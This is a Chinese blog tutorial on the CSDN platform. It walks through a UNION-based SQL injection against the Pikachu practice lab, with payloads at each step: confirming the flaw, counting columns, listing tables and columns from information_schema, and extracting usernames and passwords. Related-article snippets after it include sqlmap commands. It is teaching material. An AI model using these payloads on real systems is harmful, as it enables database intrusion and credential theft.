sql注入(获取数据库)

最新推荐文章于 2024-10-15 22:08:12 发布
最新推荐文章于 2024-10-15 22:08:12 发布
阅读量2.2k 收藏 20
点赞数 11
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rnn0921/article/details/132083847
版权

1.1 漏洞简介

        程序没有细致过滤用户输入的数据,从而导致非法数据进入系统。

        SQL注入就是把SQL命令插入到Web表单然后提交到所在页面请求(查询字符串),从而达到欺骗服务器执行恶意的SQL命令。

        它是利用现在已有的应用程序,将SQL语句插入到数据库中执行,执行一些并非按照设计者意图的SQL语句。

1.2 漏洞影响范围

SQL注入会造成以下严重后果:

  1. 盗取用户数据和隐私,这些数据被打包贩卖,或用于非法目的后,轻则损害企业品牌形象,重则将面临法律法规风险。

  2. 攻击者可对目标数据库进行“增删改查”,一旦攻击者删库,企业整个业务将陷于瘫痪,极难恢复。

  3. 植入网页木马程序,对网页进行篡改,发布一些违法犯罪信息。

  4. 攻击者添加管理员帐号。即便漏洞被修复,如果企业未及时察觉账号被添加,则攻击者可通过管理员帐号,进入网站后台。

1.3 sql注入流程

准备:pikachu漏洞练习平台

通过infermation_schema 拿下数据库

以字符型注入为例

输入kobe(pikachu常用)

得到以上信息

然后构造sql语句

select uid,email from user where name = 'kobe' or 1=1#';

输入kobe' or 1=1#'

 

 得到以上信息

此时,并不知道系统查询了几个属性

使用union联合查询

order by 排序的意思

用order by 来确定union后面有几个属性 

先给第1、2个属性排序

输入:kobe' or 1=1 order by 1#

           kobe' or 1=1 order by 2#

 

 给第三个属性排序

 发现没有第三个属性

所以 确定属性个数是2

再来获取数据库名

构造sql语句

select uid,email from user where name = kobe' or 1=1 union select database(),user()#

输入kobe' or 1=1 union select database(),user()#

 得到数据库名

再来获取数据库中的表名

select uid,email from user where name = kobe' or 1=1 union select table_schema,table_name from information_schema.tables where table_schema='root'#

注:数据库为root

        table_schema数据库,table­_name表名

        from information_schema从数据库中查询

        .tables  数据库下的一张表

        此数据库一开始就是存在的

输入 kobe' or 1=1 union select table_schema,table_name from information_schema.tables where table_schema='root'#

得到root数据库下的所有数据表名称

获取数据表下的信息

构造sql语句

select uid,email from user where name = kobe' or 1=1 union select table_name,column_name from information_schema.columns where table_name='users'#        

 注:已经知道表名   挑一张表table_name    

        column_table 存放的是每张表的名称(table_name)所对应的列名

输入: kobe' or 1=1 union select table_name,column_name from information_schema.columns where table_name='users'#        

 发现表中有用户名信息和密码信息

再来获取用户名和密码

构造sql语句

select uid,email from user where name = kobe' or 1=1 union select username,password from users #

输入:kobe' or 1=1 union select username,password from users #

 获取成功!

宁可123
关注
sql注入获取mysql版本信息_这可能是最全的SQL注入总结,很有用
weixin_28936857的博客
02-22 2512
SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入的分类按变量类型分:数字型和字符型按HTTP提交方式分:POST注入、GET注入和Cookie注入按注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入按数据库类型分:sql:oracle、MySQL、mssql、access、sq...
sql注入mysql判断_SQL注入判断数据库类型
weixin_36116139的博客
01-30 2557
SQL注入首先会判断服务端数据库的类型,通过已知不同数据库的一些特性,便于后续进一步渗透测试一般来说SQL注入存在的四个语句“SELECT/UPDATE/INSERT/DELETE”,增删改查,通过一些参数带入SQL执行语句中,再通过拼凑等方式获取更多的信息0x00 常见网页类型对应数据库关系asp : Access/SQLServerphp : Mysqljsp : Oracle0x...
获取sql数据库数据
12-07
可以获取sql数据库表中 数据,生成的是insert 语句
渗透测试-SQL注入之核心语法获取数据库信息
lza20001103的博客
04-18 6962
渗透测试-SQL注入之核心语法获取数据库信息
sql手工注入获取库、表名(union联合注入)(个人学习笔记)
最新发布
2401_86737011的博客
10-15 1234
当我们发现一个网站存在sql注入的漏洞时,可以使用sql手工注入来获取信息,如下列的网站sql注入的原理是前端给后端发送指令的时候由于设计者未考虑安全,导致用户可以加上自己的指令进去,从而让服务器完成一些列危险的操作。
利用 SQL 注入提取数据方法总结
Flag少侠的博客
04-13 1839
SQL 注入攻击中,UNION 运算符的潜在价值非常明显:如果应用程序返回了第一个(原始)查询得到的所有数据,那么通过在第一个查询后面注入一个 UNION 运算符,并添加另外一个任意查询,便可以读取到数据库用户访问过的任何一张表。
sql注入获取mysql信息_手把手教你通过SQL注入盗取数据库信息
weixin_33473110的博客
02-11 968
我们都是善良的银!一生戎码只为行侠仗义,知道这个不是为了做啥非法的事,只是知道小偷怎么偷东西才能更好地防范。SQL注入(SQL Injection),指将非法的SQL命令插入到URL或者Web表单中请求,而这些请求被服务器认为是正常的SQL语句进行执行。下面我们用sqli-labs这个开源项目来演示一下SQL注入盗取信息的全程,我们不是为了sqli-labs是一个sql注入的练习靶机,项目地址为:...
SQL注入——union获取数据库信息
m0_71714379的博客
02-05 1274
web安全学习笔记
DB2数据库SQL注入手册1
08-08
3. 数据库权限:可以使用以下SQL语句来获取数据库权限信息: ```sql SELECT grantee FROM syscat.dbauth; ``` 防止SQL注入 为了防止SQL注入攻击,可以采取以下措施: 1. 输入验证:在接收用户输入时,应该对输入...
15分钟了解sql注入(一) union注入
贤鱼的博客
09-24 1914
union注入详细教程
自动化的SQL注入数据库接管工具使用说明
06-26
- **漏洞利用**:尝试利用这些漏洞获取数据库服务器的权限。 **2. 数据库指纹识别** - **识别类型与版本**:能够识别目标数据库的类型和版本,如MySQL、Oracle、PostgreSQL等。 **3. 数据库枚举** - **信息获取...
SQL注入
weixin_73331134的博客
04-17 1998
+空格为注释#也为注释MySQL版本8.0以下授权为:GRANT ALL ON以上为:CREATE USER test@“host” IDENTIFIED BY “password” with_native_passwordSHOW DATABASES 列出所有数据库USE mysql;查看某一个数据库里的所有内容 或者是(SHOW TABLES FROM mysql)-----select语句查看当前时间查看当前选择的是哪个数据库查看当前登录数据库的用户查看数据路径。
sql注入获取数据库
qq_35490522的博客
07-25 853
sql注入和可能存在目录遍历和xss和csrf 获取web服务操作系统、web应用服务器、DBMS、当前数据等信息 sqlmap.py -u "http://域名/about.asp?id=325" --dbs --current-user 显示数据库中的表,执行命令样式: sqlmap.py -u "http://域名/about.asp?id=325" --tables 选择admin表,显示表的结构,执行命令:./sqlmap.py -u "http://域名/about.asp?id=325"
渗透测试---数据库安全: sql注入数据库原理详解
有勇气的牛排博客
02-12 4254
文章目录1 介绍2 一般步骤3 注入3 函数3.1 常用的系统函数3.2 字符串连接函数3.2.1 concat() 函数3.2.2 concat_ws() 函数3.2.3 group_concat() 函数4 注入4.1 联合查询 union 注入4.2 information_schema 注入5.2.1 获取所有数据库4.2.2 获取指定数据库的表4.2.3 获取指定表的字段名4.2.4 获取字段值得内容4.3 基于报错信息注入4.3.1 三个常用报错函数4.4 数字注入4.5 搜索注入5 sql注入
SQL获取数据库数据库名,表名,存储过程等
编程开发资料库
07-27 176
1.获取所有用户名: SQL获取所有数据库名,<B style='color:white;background-color:#880000'>表名</B>,储存过程以及参数列表 - 0o透气o0 - 让自己变懒...SELECT name FROM Sysusers where status='2' and islogin='1' SQL获取所有数据库名,<B s...
【无标题】SQL注入——MYSQL
m0_48222671的博客
04-21 2872
MYSQL注入一、SQL注入产生的条件二、判断注入点三、注入步骤1.猜解列名数量2.报错猜解3.查看当前数据库4.查看数据库名5.查看数据库表名6.查询admin列名7.查询user中的username 一、SQL注入产生的条件 可控变量 参数带入数据库查询 变量未经过过滤或过滤不严谨 二、判断注入点 下面的方法也知识可能存在,如果有404或者跳转,则没有注入 id=1 and 1=1 页面正常 id=1 and 1=1 页面错误 三、注入步骤 以判断存在注入 1.猜解列名数量 id=1 ord
mysql sql注入怎么获取数据_SQL注入获取数据的一些技巧
weixin_36170656的博客
01-31 416
最近接触了好多欧美日韩台一、MSSQL获取数据:用的比较多的就是for xml raw了,MSSQL2000都支持的!注入中显示数据的两个办法均可以使用,一是union select、二是显错,以MSSQL2005为例:select username from members where 1=2 union select top 3 username from members for xml ra...
SQL注入获取数据库V1—自动化脚本
weixin_48968378的博客
12-14 1449
1、搭建好python环境,新建一个文件夹将代码复制进文件夹中命名以“.py”结尾,同时新建一个文件cmd.bat文件,文件内容是:cmd.exe 2、双击cmd.bat文件,进入cmd命令界面 3、输入命令 :python sqlbind_v1.py 回车执行 回车执行得数据库名: 获取表名: 字段名: 到此处我们就可以退出了,不用查看字段内容 下面是代码,在执行前一定先去修改payload和标志位,在执行的过程中如果较慢,可以将代码中的httpx请求换成req...
class1-SQL注入如何获取数据,
qq_46185846的博客
02-18 194
第1天: SQL注入如何获取数据,主要information_ schema数据库, 存储有所有的信息, union select联合查询。 SELECT * FROM users WHERE id=‘4’ 对他进行分析 – + Mysql注入中最常见的注释符号 –这个才是Mysq真正的注释符号 +号会被浏览器进行url编码,编码成一 个空格 如何突破: SELECT * FROM users W...
Sql注入获取数据库名称,连接数据库的用户名的语句
05-31
以下是一个简单的 SQL 注入语句,可以获取数据库名称和连接数据库的用户名: ``` SELECT DATABASE(), USER() ``` 该语句将返回当前连接的数据库名称和连接数据库的用户名。请注意,这只是一个简单的示例,实际情况...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值